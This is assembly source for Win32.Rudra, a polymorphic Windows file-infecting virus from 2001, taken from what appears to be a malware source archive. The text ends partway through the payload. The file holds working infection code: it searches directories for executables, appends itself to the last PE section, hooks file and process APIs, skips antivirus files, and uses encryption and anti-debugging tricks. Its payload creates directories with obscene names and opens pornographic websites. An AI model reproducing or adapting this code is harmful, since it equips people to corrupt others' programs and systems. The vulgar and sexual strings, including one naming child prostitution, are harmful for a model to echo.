MalwareSourceCode/Win32/Infector/Win32.Rudra.asm
2020-10-16 23:26:21 +02:00

1831 lines
42 KiB
NASM

; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Ä< Win32.Rudra >Ä
; Designed by LiteSys
;
; This is Rudra, my first polymorphic virus. It's a direct action (with
; directory backwards navigation) and a per-process resident virus. Hooks
; the following APIs: CreateProcessA, WinExec, CreateFileA, OpenFileA,
; CopyFileA, MoveFileA, _lopen.
;
; To say that the poly engine is stupid is an appropiate metaphor, the
; reasons are obvious: the decryption opcodes are fixed and in a fixed
; position in the decryptor, so it would be very easy to the avers to
; detect it using mask. I used two encryption layers (maybe it's a very bad
; implemented idea), being the first the polymorphic one.
; It's the first poly engine i've written so far, and I didn't have any
; other poly code so I think many concepts are still unclear in my mind.
; But next will be better, promised.
;
; The infection algorithm is, obviously, last section expanding, I really
; don't care about overwriting the .reloc section, albeit it's never used,
; I let it alone...
;
; This virus has multiple payloads. Executed every sabbath, consists in
; executing one of the three following payloads:
;
; + Creates some stupid named directories on the root directory with a
; little offensive note in spanish.
; + Browses to some Venezuelan XXX sites (I included a lame C:\con\con to
; hang up some idiots).
; + Sets the hard disk label with some offensive stuff.
;
; This virus uses SEH to generate an exception and to trap any possible
; exceptions.
;
; Don't ask me why that name, it came from nothing... hehe. Ok, ok, ok,
; you get a prize if you guess where did this name came from!
;
; By the way, this is another shitty virus written by me... don't expect
; too much stability or optimization 'cause I don't have time to spend
; with it...
;
; So, in resume, this virus has:
;
; + Per-Process Residence
; + Direct Action Infection with directory backwards navigation
; + Last section infection
; + Avoids infecting some "suspicious" AV-like files
; + SEH for antidebugging purposes
; + SEH for stability purposes
; + Two layers of encryption, first one is polymorphic
; + Simple, lame and weak polymorphism
; + Multiple Payloads
; + Does other stuff.
; + Virus Size: 5392 bytes.
;
; So, I don't have anything else to say about this shit, maybe greets, yeah
; greets are gewd and go to: Mindlock, Knight-7, Evul, Gigabyte, Tokugawa,
; Maquiavelo, Thorndike and everybody I forgot... hope you forgive me =P.
;
; LiteSys.
; "Patria o Muerte: Venceremos" (Ernesto "Che" Guevara)
; Venezuela, Junio/Julio 2001
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
.386
.MODEL FLAT, STDCALL
LOCALS
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
.DATA
Tama¤o_Virus EQU (Termina_Virus - Empieza_Virus)
Tama¤o_Decrip EQU (Empieza_Virus - Rudra)
Tama¤o_Total EQU (Tama¤o_Decrip + Tama¤o_Virus)
Tama¤o_Layer2 EQU (Termina_Virus - Empieza_Layer2)
APICALL MACRO APIx
CALL DWORD PTR [EBP][APIx]
ENDM
OFS EQU <OFFSET [EBP]>
BY EQU <BYTE PTR [EBP]>
WO EQU <WORD PTR [EBP]>
DWO EQU <DWORD PTR [EBP]>
PAGINAS EQU <32h>
KERNEL_9X EQU <0BFF70000h>
GPA_9X EQU <0BFF76DACh>
CRLF EQU <0Dh, 0Ah>
RDTSC EQU <DW 310Fh>
SYSTEMTIME STRUC
wYear DW 0000h
wMonth DW 0000h
wDayOfWeek DW 0000h
wDay DW 0000h
wHour DW 0000h
wMinute DW 0000h
wSecond DW 0000h
wMilliseconds DW 0000h
SYSTEMTIME ENDS
Titulo DB "-=( Rudra )=-", 00h
Ventana DB "Virus 'Rudra' por LiteSys", CRLF
DB "Primera Generacion!", CRLF, CRLF
DB "Tamaño total del virus: "
DB Tama¤o_Total / 1000 MOD 10 + 30h
DB Tama¤o_Total / 0100 MOD 10 + 30h
DB Tama¤o_Total / 0010 MOD 10 + 30h
DB Tama¤o_Total / 0001 MOD 10 + 30h
DB CRLF
DB 00h
.CODE
Rudra:
DB 24d DUP (90h) ; los bloques son llenados con la basura del poly
CALL Delta
Delta:
DB 24d DUP (90h)
POP EBP
DB 24d DUP (90h)
SUB EBP, OFFSET Delta
DB 24d DUP (90h)
LEA EDI, OFS [Empieza_Virus]
DB 24d DUP (90h)
MOV ECX, Tama¤o_Virus / 4
DB 24d DUP (90h)
@KZ: XOR DWORD PTR [EDI], 00000000h
DB 27d DUP (90h)
ADD EDI, 00000004h
DB 24d DUP (90h)
LOOP @KZ
Empieza_Virus LABEL NEAR
MOV ECX, Tama¤o_Layer2 / 2
LEA EDI, OFS [Empieza_Layer2]
@DCL2:
SUB WORD PTR [EDI], "HO"
ORG $-2
Llave_II DW 0000h
ADD EDI, 02d
LOOP @DCL2
Empieza_Layer2 LABEL NEAR
JMP @@1
DB " [RUDRA] "
@@1:
MOV EDI, DWORD PTR [ESP]
PUSHAD
CALL @Seh_1
MOV ESP, [ESP+8h]
XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP EAX
POPAD
JMP @SigueCodigo
@Seh_1:
XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP
DEC BYTE PTR [EAX]
@SigueCodigo:
CALL @Seh_2
MOV ESP, [ESP+8h]
XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP EAX
JMP @Finale
@Seh_2:
XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP
CALL @Mardito
@Mardito:
POP EAX
SUB EAX, "HOHO"
ORG $-4
El_EIP DD 00001000h
SUB EAX, (@Mardito - Rudra)
MOV DWO [IBase], EAX
CALL Obtener_K32
MOV EBX, EAX
CALL Obtener_GPA
MOV EBX, DWO [KERNEL32]
LEA EDI, OFS [APIs_KERNEL32]
LEA ESI, OFS [LoadLibraryA]
CALL Obtener_APIs
LEA EAX, OFS [Directorio_Inicial]
PUSH EAX
PUSH MAX_PATH
APICALL GetCurrentDirectoryA
@Busca_Primero:
LEA EAX, OFS [Busqueda]
PUSH EAX
LEA EAX, OFS [Archivos]
PUSH EAX
APICALL FindFirstFileA
MOV DWO [SHandle], EAX
INC EAX
JZ @Nada
@La_Recluta:
LEA EDI, OFS [Busqueda.wfd_szFileName]
XOR EAX, EAX
SCASB
JNZ $-1
MOV EAX, DWORD PTR [EDI-5h]
OR EAX, 20202020h
CMP EAX, "exe." ; *.exe
JE @Enchufalo
CMP EAX, "rcs." ; *.scr
JE @Enchufalo
CMP EAX, "lpc." ; *.cpl
JE @Enchufalo
@Busca_Proximo:
LEA EAX, OFS [Busqueda]
PUSH EAX
PUSH DWO [SHandle]
APICALL FindNextFileA
OR EAX, EAX
JNZ @La_Recluta
PUSH DWO [SHandle]
APICALL FindClose
@Nada:
LEA EAX, OFS [PaTras]
PUSH EAX
APICALL SetCurrentDirectoryA
LEA EAX, OFS [Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
APICALL GetCurrentDirectoryA
CMP EAX, DWO [Virgo]
JE @Fin_DA
MOV DWO [Virgo], EAX
JMP @Busca_Primero
@Fin_DA:
LEA EAX, OFS [Directorio_Inicial]
PUSH EAX
APICALL SetCurrentDirectoryA
CALL Hookear
CALL Paylo
@Finale:
PUSH "HOHO"
ORG $-4
Retorno DD OFFSET Host_Falso
RET
; 01h -> Create
; 02h -> File
; 03h -> Map
; 04h -> View
; 05h -> Find
; 06h -> Close
; 07h -> Set
; 08h -> Get
; 09h -> Load
; 0Ah -> CurrentDirectory
; 0Bh -> Virtual
APIs_KERNEL32 DB 09h, "LibraryA", 00h ; LoadLibraryA
DB 01h, 02h, "A", 00h ; CreateFileA
DB 01h, 02h, 03h, "pingA", 00h ; CreateFileMappingA
DB 03h, 04h, "Of", 02h, 00h ; MapViewOfFile
DB "Unmap", 04h, "Of", 02h, 00h; UnmapViewOfFile
DB 06h, "Handle", 00h ; CloseHandle
DB 05h, "First", 02h, "A", 00h ; FindFirstFileA
DB 05h, "Next", 02h, "A", 00h ; FindNextFileA
DB 05h, 06h, 00h ; FindClose
DB 07h, 02h, "AttributesA", 00h; SetFileAttributesA
DB 08h, 02h, "Size", 00h ; GetFileSize
DB 07h, 02h, "Pointer", 00h ; SetFilePointer
DB 07h, "EndOf", 02h, 00h ; SetEndOfFile
DB 08h, 0Ah, "A", 00h ; GetCurDirA
DB 07h, 0Ah, "A", 00h ; SetCurDirA
DB 08h, "TickCount", 00h ; GetTickCount
DB 08h, "SystemTime", 00h ; GetSystemTime
DB "_lopen", 00h ; _lopen
DB "Open", 02h, "A", 00h ; OpenFileA
DB "Move", 02h, "A", 00h ; MoveFileA
DB "Copy", 02h, "A", 00h ; CopyFileA
DB 01h, "ProcessA", 00h ; CreateProcessA
DB "WinExec", 00h ; WinExec
DB 0Bh, "Alloc", 00h ; VirtualAlloc
DB 0Bh, "Free", 00h ; VirtualFree
DB 01h, "DirectoryA", 00h ; CreateDirA
DB "_lcreat", 00h
DB "_lwrite", 00h
DB 07h, "VolumeLabelA", 00h
DB 0FFh
LoadLibraryA DD 00000000h
CreateFileA DD 00000000h
CreateFileMappingA DD 00000000h
MapViewOfFile DD 00000000h
UnmapViewOfFile DD 00000000h
CloseHandle DD 00000000h
FindFirstFileA DD 00000000h
FindNextFileA DD 00000000h
FindClose DD 00000000h
SetFileAttributesA DD 00000000h
GetFileSize DD 00000000h
SetFilePointer DD 00000000h
SetEndOfFile DD 00000000h
GetCurrentDirectoryA DD 00000000h
SetCurrentDirectoryA DD 00000000h
GetTickCount DD 00000000h
GetSystemTime DD 00000000h
_lopen DD 00000000h
OpenFileA DD 00000000h
MoveFileA DD 00000000h
CopyFileA DD 00000000h
CreateProcessA DD 00000000h
WinExec DD 00000000h
VirtualAlloc DD 00000000h
VirtualFree DD 00000000h
CreateDirectoryA DD 00000000h
_lcreat DD 00000000h
_lwrite DD 00000000h
SetVolumeLabelA DD 00000000h
IBase DD 00000000h
Firma DB "-=( RUDRA )=-", 0Dh, 0Ah
@Enchufalo:
LEA EBX, OFS [Busqueda.wfd_szFileName]
CALL Infectar_PE
JMP @Busca_Proximo
Fecha SYSTEMTIME <>
Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (00h)
Archivos DB "*.???", 00h
PaTras DB "..", 00h
SHandle DD 00000000h
Virgo DD 00000000h
KERNEL32 DD 00000000h
Directorio_Inicial DB MAX_PATH DUP (00h)
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Proceso para obtener la base de K32 y GetProcAddress.
;
; EDI -> Doble Palabra apuntada por ESP que representa el
; call...
Obtener_K32 PROC
AND EDI, 0FFFF0000h
PUSH PAGINAS
POP ECX
@Revisa_K32:
PUSH EDI
CMP BYTE PTR [EDI], "M"
JNE @Proximo_K32
ADD EDI, [EDI+3Ch]
CMP BYTE PTR [EDI], "P"
JE @Encontrado_K32
@Proximo_K32:
POP EDI
SUB EDI, 1000h
LOOP @Revisa_K32
@Encontrado_K32:
POP EAX
MOV DWO [KERNEL32], EAX
RET
Obtener_K32 ENDP
DB 10h DUP (90h)
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Proceso para obtener la base de GetProcAddress
;
; EBX -> Base de KERNEL32.
Obtener_GPA PROC
MOV ESI, EBX
ADD ESI, DWORD PTR [ESI+3Ch]
MOV ESI, DWORD PTR [ESI+78h]
ADD ESI, EBX ; Obtiene tabla de exportaciones.
MOV DWO [EXPORTS], ESI
MOV ECX, DWORD PTR [ESI+18h]
DEC ECX
MOV ESI, DWORD PTR [ESI+20h]
ADD ESI, EBX
XOR EAX, EAX
@Busca:
MOV EDI, DWORD PTR [ESI]
ADD EDI, EBX
PUSH ESI
LEA ESI, OFS [GPA]
PUSH ECX
PUSH Largo_GPA
POP ECX
REP CMPSB
JE @Encontrado_GPA
POP ECX
INC EAX
POP ESI
ADD ESI, 4h
LOOP @Busca
JMP @Hardcode
@Encontrado_GPA:
POP ESI
POP ECX
MOV EDI, DWO [EXPORTS]
ADD EAX, EAX
MOV ESI, DWORD PTR [EDI+24h]
ADD ESI, EBX
ADD ESI, EAX
MOVZX EAX, WORD PTR [ESI]
IMUL EAX, EAX, 4h
MOV ESI, DWORD PTR [EDI+1Ch]
ADD ESI, EBX
ADD ESI, EAX
MOV EAX, DWORD PTR [ESI]
ADD EAX, EBX
MOV DWO [GetProcAddress], EAX
RET
@Hardcode:
PUSH GPA_9X
POP EAX
MOV DWO [GetProcAddress], EAX
RET
EXPORTS DD 00000000h
GPA DB "GetProcAddress", 00h
Largo_GPA EQU $-GPA
GetProcAddress DD 00000000h
Obtener_GPA ENDP
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Proceso para obtener y desempaquetar las APIs
;
; EBX -> Modulo.
; EDI -> Cadenas de las APIs (empaquetadas).
; ESI -> DWORDs para guardar las rvas.
Obtener_APIs PROC
; 01h -> Create
; 02h -> File
; 03h -> Map
; 04h -> View
; 05h -> Find
; 06h -> Close
; 07h -> Set
; 08h -> Get
; 09h -> Load
; 0Ah -> CurrentDirectory
; 0Bh -> Virtual
PUSHAD
MOV DWO [PaGuardar], ESI
XCHG ESI, EDI
@OA1:
LEA EDI, OFS [API_Trabajo]
@OA2:
CMP BYTE PTR [ESI], 00h
JE @OA4
LODSB
CMP AL, 0Bh
JA @OA3
XOR ECX, ECX
MOV CL, AL
PUSH ESI
LEA ESI, OFS [API_Packer]
@OA5:
INC ESI
CMP BYTE PTR [ESI], 00h
JNZ @OA5
LOOP @OA5
INC ESI
@OA6:
MOVSB
CMP BYTE PTR [ESI], 00h
JNZ @OA6
POP ESI
JMP @OA2
@OA3:
STOSB
JMP @OA2
@OA4:
XOR AL, AL
STOSB
LEA EAX, OFS [API_Trabajo]
PUSH EAX
PUSH EBX
APICALL GetProcAddress
PUSH ESI
MOV ESI, DWO [PaGuardar]
MOV DWORD PTR [ESI], EAX
ADD ESI, 4h
MOV DWO [PaGuardar], ESI
POP ESI
INC ESI
CMP BYTE PTR [ESI], 0FFh
JNZ @OA1
@OA7:
POPAD
RET
API_Trabajo DB 32 DUP (00h)
PaGuardar DD 00000000h
API_Packer DB ":)", 00h
DB "Create", 00h
DB "File", 00h
DB "Map", 00h
DB "View", 00h
DB "Find", 00h
DB "Close", 00h
DB "Set", 00h
DB "Get", 00h
DB "Load", 00h
DB "CurrentDirectory", 00h
DB "Virtual", 00h
; 01h -> Create
; 02h -> File
; 03h -> Map
; 04h -> View
; 05h -> Find
; 06h -> Close
; 07h -> Set
; 08h -> Get
; 09h -> Load
; 0Ah -> CurrentDirectory
; 0Bh -> Virtual
Obtener_APIs ENDP
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Proceso para infectar un archivo PE.
; EBX -> Nombre del archivo.
Infectar_PE PROC
PUSHAD
PUSH DWO [Retorno]
POP DWO [EP_Viejo]
MOV EAX, DWORD PTR [EBX]
OR EAX, 20202020h
LEA ESI, OFS [Bad_Dwords]
@Rev_BadDW:
CMP EAX, DWORD PTR [ESI]
JE @Fin_IPE
ADD ESI, 4h
CMP BYTE PTR [ESI], 0FFh
JNE @Rev_BadDW
@Rev_BadW:
INC ESI
CMP AX, WORD PTR [ESI]
JE @Fin_IPE
ADD ESI, 2h
CMP BYTE PTR [ESI], 0FFh
JNE @Rev_BadW
PUSH FILE_ATTRIBUTE_NORMAL
PUSH EBX
APICALL SetFileAttributesA
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
PUSH EBX
APICALL CreateFileA
MOV DWO [FHandle], EAX
INC EAX
JZ @Fin_IPE
DEC EAX
XOR EBX, EBX
PUSH EBX
PUSH EAX
APICALL GetFileSize
MOV DWO [Tama¤o], EAX
INC EAX
JZ @Fin_IPE
DEC EAX
ADD EAX, Tama¤o_Total+1000h
MOV DWO [Tama¤o2], EAX
XOR EBX, EBX
PUSH EBX
PUSH EAX
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH DWO [FHandle]
APICALL CreateFileMappingA
MOV DWO [MHandle], EAX
OR EAX, EAX
JZ @Cierra_FHandle
XOR EBX, EBX
PUSH DWO [Tama¤o2]
PUSH EBX
PUSH EBX
PUSH FILE_MAP_WRITE
PUSH EAX
APICALL MapViewOfFile
MOV DWO [BaseMap], EAX
OR EAX, EAX
JZ @Cierra_MHandle
MOV EDI, EAX
MOV BX, WORD PTR [EDI]
AND BX, 9473h
XOR BX, 1041h ; 'ZM' & 9473h == 1014h
JNZ @Cierra_BaseMap
ADD EDI, [EDI+3Ch]
MOV BX, WORD PTR [EDI]
OR BX, 1218h ; 'EP' | 1218h == 5758h
XOR BX, 5758h
JNZ @Cierra_BaseMap
CMP DWORD PTR [EDI+4Ch], " XSL"
JE @Cierra_BaseMap
MOV DWORD PTR [EDI+4Ch], " XSL"
MOV ESI, EDI
ADD ESI, 18h
MOVZX EAX, WORD PTR [EDI+14h]
ADD ESI, EAX
XOR EDX, EDX
MOVZX EDX, WORD PTR [EDI+06h]
DEC EDX
IMUL EDX, EDX, 28h
ADD ESI, EDX ; secciones.
MOV EBX, 0A0000020h
OR DWORD PTR [ESI+24h], EBX ; atributos.
MOV EAX, DWORD PTR [ESI+8h]
PUSH EAX
ADD EAX, Tama¤o_Total
MOV DWORD PTR [ESI+8h], EAX
MOV EBX, DWORD PTR [EDI+3Ch]
XOR EDX, EDX
DIV EBX
INC EAX
MUL EBX
MOV DWORD PTR [ESI+10h], EAX
POP EDX
MOV EAX, DWORD PTR [EDI+28h]
MOV EBX, DWORD PTR [EDI+34h]
ADD EAX, EBX
MOV DWO [Retorno], EAX
ADD EDX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+28h], EDX
MOV DWO [El_EIP], EDX
MOV EAX, DWORD PTR [ESI+10h]
ADD EAX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+50h], EAX
MOV EDI, DWORD PTR [ESI+14h]
ADD EDI, DWORD PTR [ESI+8h]
MOV ECX, Tama¤o_Virus
SUB EDI, Tama¤o_Total
ADD EDI, DWO [BaseMap]
CALL RUMEN
PUSH DWO [Tama¤o2]
POP DWO [Tama¤o]
MOV EAX, EDI
SUB EAX, DWO [BaseMap]
MOV ECX, DWO [Tama¤o]
SUB ECX, EAX
OR ECX, ECX
JB @Cierra_BaseMap
XOR EAX, EAX
REP STOSB ; meramente estetico.
@Cierra_BaseMap:
PUSH DWO [BaseMap]
APICALL UnmapViewOfFile
@Cierra_MHandle:
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH DWO [Tama¤o]
PUSH DWO [FHandle]
APICALL SetFilePointer
PUSH DWO [FHandle]
APICALL SetEndOfFile
PUSH DWO [MHandle]
APICALL CloseHandle
@Cierra_FHandle:
PUSH DWO [FHandle]
APICALL CloseHandle
@Fin_IPE:
PUSH DWO [EP_Viejo]
POP DWO [Retorno]
POPAD
RET
FHandle DD 00000000h
MHandle DD 00000000h
BaseMap DD 00000000h
Tama¤o DD 00000000h
Tama¤o2 DD 00000000h
SizeOfRawData DD 00000000h
EP_Viejo DD 00000000h
Bad_DWords DB "defr" ; defrag
DB "scan" ; scandisk
DB "anti"
DB "rund"
DB 0FFh
Bad_Words DB "av"
DB "sc"
DB "tb"
DB "f-"
DB "no"
DB "00"
DB "aa"
DB 0FFh
Infectar_PE ENDP
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
DB "[" XOR 33h
DB "D" XOR 33h
DB "e" XOR 33h
DB "s" XOR 33h
DB "i" XOR 33h
DB "g" XOR 33h
DB "n" XOR 33h
DB "e" XOR 33h
DB "d" XOR 33h
DB " " XOR 33h
DB "b" XOR 33h
DB "y" XOR 33h
DB " " XOR 33h
DB "L" XOR 33h
DB "i" XOR 33h
DB "t" XOR 33h
DB "e" XOR 33h
DB "S" XOR 33h
DB "y" XOR 33h
DB "s" XOR 33h
DB "]" XOR 33h
DB 33h
DB 0Dh XOR 33h
DB 0Ah XOR 33h
DB "(" XOR 33h
DB "c" XOR 33h
DB ")" XOR 33h
DB " " XOR 33h
DB "J" XOR 33h
DB "u" XOR 33h
DB "n" XOR 33h
DB "i" XOR 33h
DB "o" XOR 33h
DB "/" XOR 33h
DB "J" XOR 33h
DB "u" XOR 33h
DB "l" XOR 33h
DB "i" XOR 33h
DB "o" XOR 33h
DB " " XOR 33h
DB "2" XOR 33h
DB "0" XOR 33h
DB "0" XOR 33h
DB "1" XOR 33h
DB " " XOR 33h
DB "-" XOR 33h
DB " " XOR 33h
DB "H" XOR 33h
DB "e" XOR 33h
DB "c" XOR 33h
DB "h" XOR 33h
DB "o" XOR 33h
DB " " XOR 33h
DB "e" XOR 33h
DB "n" XOR 33h
DB " " XOR 33h
DB "V" XOR 33h
DB "e" XOR 33h
DB "n" XOR 33h
DB "e" XOR 33h
DB "z" XOR 33h
DB "u" XOR 33h
DB "e" XOR 33h
DB "l" XOR 33h
DB "a" XOR 33h
DB "!" XOR 33h
DB 33h
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Proceso para hookear las APIs, residencia por procesos pues...
Hookear PROC
PUSHAD
LEA EDI, OFS [A_CreateFileA]
PUSH "nrek"
POP DWO [PString]
@Hook_Una:
PUSH EDI
CALL @Obtener_Import
POP EDI
OR EAX, EAX
JZ @ProxAPI2
XOR AL, AL
SCASB
JNZ $-1
MOV EAX, DWORD PTR [EDI]
ADD EAX, EBP
MOV DWORD PTR [EBX], EAX
@ProxAPI:
ADD EDI, 4h
CMP BYTE PTR [EDI], 0FFh
JNZ @Hook_Una
@Fin_Hookear:
POPAD
RET
@ProxAPI2:
XOR AL, AL
SCASB
JNZ $-1
JMP @ProxAPI
A_CreateFileA DB "CreateFileA", 00h
I_CreateFileA DD (@Hook_CreateFileA)
A_OpenFileA DB "OpenFileA", 00h
I_OpenFileA DD (@Hook_OpenFileA)
A_MoveFileA DB "MoveFileA", 00h
I_MoveFileA DD (@Hook_MoveFileA)
A_CopyFileA DB "CopyFileA", 00h
I_CopyFileA DD (@Hook_CopyFileA)
A__lopen DB "_lopen", 00h
I__lopen DD (@Hook__lopen)
A_CreateProcessA DB "CreateProcessA", 00h
I_CreateProcessA DD (@Hook_CreateProcessA)
A_WinExec DB "WinExec", 00h
I_WinExec DD (@Hook_WinExec)
DB 0FFh
PString DD 00000000h
Cuento DB 00h
TString DB 00h
@Hook_Comun:
PUSHAD
PUSHFD
MOV EDI, DWORD PTR [ESP+2Ch]
MOV EBX, EDI
XOR AL, AL
SCASB
JNZ $-1
MOV EDX, DWORD PTR [EDI-5h]
OR EDX, 20202020h
CMP EDX, "exe."
JZ @InfectaHook
CMP EDX, "rcs."
JZ @InfectaHook
CMP EDX, "lpc."
JZ @InfectaHook
@Regresa_Hook:
POPFD
POPAD
RET
@InfectaHook:
CALL Infectar_PE
JMP @Regresa_Hook
@Hook_CreateFileA:
CALL @Hook_Comun
JMP DWO [CreateFileA]
@Hook_OpenFileA:
CALL @Hook_Comun
JMP DWO [OpenFileA]
@Hook_MoveFileA:
CALL @Hook_Comun
JMP DWO [MoveFileA]
@Hook_CopyFileA:
CALL @Hook_Comun
JMP DWO [CopyFileA]
@Hook__lopen:
CALL @Hook_Comun
JMP DWO [_lopen]
@Hook_CreateProcessA:
CALL @Hook_Comun
JMP DWO [CreateProcessA]
@Hook_WinExec:
CALL @Hook_Comun
JMP DWO [WinExec]
; Those routines belong to Billy Belcebu's VWG32...
@Obtener_Import:
PUSH EDI
XOR ECX, ECX
XOR AL, AL
INC ECX
SCASB
JNE $-2
MOV BY [TString], CL
MOV EDI, DWO [IBase]
MOV EBX, EDI
ADD EDI, [EDI+3Ch]
MOV AX, WORD PTR [EDI]
XOR AX, 6699h
CMP AX, 23C9h ; "EP" ^| 6699h == 23C9h
JNE @Fin_OI
MOV ESI, DWORD PTR [EDI+7Ch]
ADD ESI, DWORD PTR [EDI+80h]
ADD ESI, EBX
@Rebusca_PString:
PUSH ESI
MOV ESI, [ESI+0Ch]
ADD ESI, EBX
MOV EDX, DWORD PTR [ESI]
OR EDX, 20202020h
CMP EDX, DWO [PString]
POP ESI
JE @Enco_K32
ADD ESI, 14h
JMP @Rebusca_PString
@Enco_K32:
CMP BYTE PTR [ESI], 00h
JE @Fin_OI
MOV EDX, [ESI+10h]
ADD EDX, EBX
AND BY [CUENTO], 00h
LODSD
OR EAX, EAX
JZ @Fin_OI
XCHG EDX, EAX
ADD EDX, EBX
@Ciclo_API:
CMP DWORD PTR [EDX], 00000000h
JE @Fin_OI
CMP BYTE PTR [EDX+3h], 80h
JE @Lesigue
POP EDI
PUSH EDI
MOVZX ECX, BY [TString]
MOV ESI, DWORD PTR [EDX]
ADD ESI, EBX
ADD ESI, 2h
PUSH ECX
REP CMPSB
POP ECX
JE @Okaza
@Lesigue:
INC BY [Cuento]
ADD EDX, 4h
JMP @Ciclo_API
@Okaza:
ADD ESP, 4d
MOVZX EBX, BY [Cuento]
IMUL EBX, 4h
ADD EBX, EAX
MOV EAX, DWORD PTR [EBX]
RET
@Fin_OI:
ADD ESP, 4d
XOR EAX, EAX
RET
Hookear ENDP
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Paylo PROC
PUSHAD
APICALL GetTickCount
NEG EAX
MOV DWO [Puyado], EAX
LEA EAX, OFS [Fecha]
PUSH EAX
APICALL GetSystemTime
CMP WO [Fecha.wDayOfWeek], 6d
JNZ @Retorna_Paylo
PUSH 00000003h
POP EBX
CALL @Puyalo
OR EAX, EAX
JZ @CrearDirectorios
CMP EAX, 1d
JZ @PonerSitios
CMP EAX, 2d
JZ @CambiarVolumen
@Retorna_Paylo:
POPAD
RET
Directorios DB "\El Guevo", 00h
DB "\Fotos Porno", 00h
DB "\Sodomia y Otras Perversiones", 00h
DB "\Prostitucion de Ni¤as", 00h
DB "\Ventas de Cocaina", 00h
DB "\Planes de Golpe de Estado", 00h
DB "\Facturas de Autos Robados", 00h
DB "\Se vende este computador", 00h
DB "\Rudra", 00h
Idioteces DB "Te meto hasta el fondo!", 00h
DB "Toma guevo por curioso", 00h
DB "Vamos a jugar keto: vos te agachas, yo te lo meto.", 0Dh, 0Ah
DB "O que tal piragua?", 0Dh, 0Ah
DB "Y Rinoceronte?", 00h
DB "Alarma activada! Alarma activada! Llamando a "
DB "la DISIP por modem! acusando por violacion de "
DB "los derechos humanos!", 00h
DB "La DHEA ha sido contactada... usted esta rodeado.", 00h
DB "Andate pa' la puta mierda adeco corrupto sucio culiao.", 00h
DB "Mardito sea el que se llevo mi Fairlander!!!", 00h
DB "Gracias por activar esta opcion. En este "
DB "momento estamos colocando un clasificado en "
DB "El Universal para la venta de su computador.", 00h
DB "Que? yo? un virus? estas loco? COMO TE ATREVES!", 00h
Sitios_Web DB "http://www.sexycaracas.com", 00h
DB "http://www.pornocaracas.com", 00h
DB "http://www.venezuelaerotica.com", 00h
DB "http://www.sexoloco.com", 00h
DB "file://C:\con\con", 00h
Volumenz DB "Mierda", 00h
DB "Sodomia", 00h
DB "Mis Nalgas", 00h
DB "Gay Tu Papa", 00h
DB "Putas", 00h
DB "Rudra", 00h
@Puyalo:
MOV EAX, DWO [Puyado]
ADD DWO [Puyado], EAX
XOR EDX, EDX
DIV EBX
XCHG EDX, EAX
RET
@CrearDirectorios:
PUSH 10d
POP EBX
CALL @Puyalo
XCHG ECX, EAX
LEA EDI, OFS [Directorios]
PUSH ECX
XOR AL, AL
@CD1:
SCASB
JNZ @CD1
LOOP @CD1
PUSH NULL
PUSH EDI
APICALL CreateDirectoryA
PUSH EDI
APICALL SetCurrentDirectoryA
PUSH NULL
CALL @CD2
DB "Leeme Por Favor.txt", 00h, 90h
